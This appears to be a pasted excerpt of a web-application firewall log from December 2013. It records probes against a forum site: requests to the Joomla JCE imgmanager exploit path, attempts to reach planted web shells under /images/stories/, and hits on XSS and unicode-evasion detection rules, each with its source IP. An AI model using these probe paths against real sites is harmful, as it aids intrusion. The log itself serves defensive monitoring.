  581. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  582. IP: 78.110.50.122
  583. DATE: 11-Dec-2013 08:26:49
  584. -------------------------
  585. LOG: Images Stories Hack Probe
  586. URL: http://newz.scriptz-team.info/images/stories/adrelite.php?rf
  587. IP: 78.110.50.122
  588. DATE: 11-Dec-2013 08:26:51
  589. -------------------------
  590. LOG: Images Stories Hack Probe
  591. URL: http://newz.scriptz-team.info//images/stories/3xp.php
  592. IP: 193.87.74.130
  593. DATE: 11-Dec-2013 08:44:54
  594. -------------------------
  595. LOG: Images Stories Hack Probe
  596. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs//images/stories/3xp.php
  597. IP: 193.87.74.130
  598. DATE: 11-Dec-2013 08:45:09
  599. -------------------------
  600. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  601. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Installations-and-Upgrades/057093-Suite-I-can%C3%83%E2%80%9A%C3%82%C2%B4t-access-admin-panel-after-upgrade-from-3-8-7-to-4-1-5.html
  602. IP: 192.119.151.90
  603. DATE: 11-Dec-2013 09:01:04
  604. -------------------------
  605. LOG: Nasty Joomla Probe
  606. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  607. IP: 207.55.247.216
  608. DATE: 11-Dec-2013 09:52:13
  609. -------------------------
  610. LOG: Images Stories Hack Probe
  611. URL: http://www.scriptz-team.info//images/stories/bonek.php?rf
  612. IP: 207.55.247.216
  613. DATE: 11-Dec-2013 09:52:15
  614. -------------------------
  615. LOG: Images Stories Hack Probe
  616. URL: http://www.scriptz-team.info//images/stories/bonek.php?clone
  617. IP: 207.55.247.216
  618. DATE: 11-Dec-2013 09:52:15
  619. -------------------------
  620. LOG: Images Stories Hack Probe
  621. URL: http://www.scriptz-team.info//images/stories/bonek.php?rf
  622. IP: 207.55.247.216
  623. DATE: 11-Dec-2013 09:52:48
  624. -------------------------
  625. LOG: Images Stories Hack Probe
  626. URL: http://www.scriptz-team.info//images/stories/bonek.php?clone
  627. IP: 207.55.247.216
  628. DATE: 11-Dec-2013 09:52:49
  629. -------------------------
  630. LOG: Detects common XSS concatenation patterns 1/2
  631. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  632. IP: 108.178.5.27
  633. DATE: 11-Dec-2013 10:09:03
  634. -------------------------
  635. LOG: Detects common XSS concatenation patterns 1/2
  636. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  637. IP: 108.178.5.27
  638. DATE: 11-Dec-2013 10:09:07
  639. -------------------------
  640. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  641. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Installations-and-Upgrades/057093-Suite-I-can%C3%83%E2%80%9A%C3%82%C2%B4t-access-admin-panel-after-upgrade-from-3-8-7-to-4-1-5.html
  642. IP: 198.143.162.236
  643. DATE: 11-Dec-2013 10:19:15
  644. -------------------------
  645. LOG: Detects common XSS concatenation patterns 1/2
  646. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  647. IP: 151.237.186.221
  648. DATE: 11-Dec-2013 11:10:32
  649. -------------------------
  650. LOG: Detects common XSS concatenation patterns 1/2
  651. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  652. IP: 151.237.186.221
  653. DATE: 11-Dec-2013 11:10:34
  654. -------------------------
  655. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  656. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Installations-and-Upgrades/057093-Suite-I-can%C3%83%E2%80%9A%C3%82%C2%B4t-access-admin-panel-after-upgrade-from-3-8-7-to-4-1-5.html
  657. IP: 97.76.187.84
  658. DATE: 11-Dec-2013 11:11:12
RAW Paste Data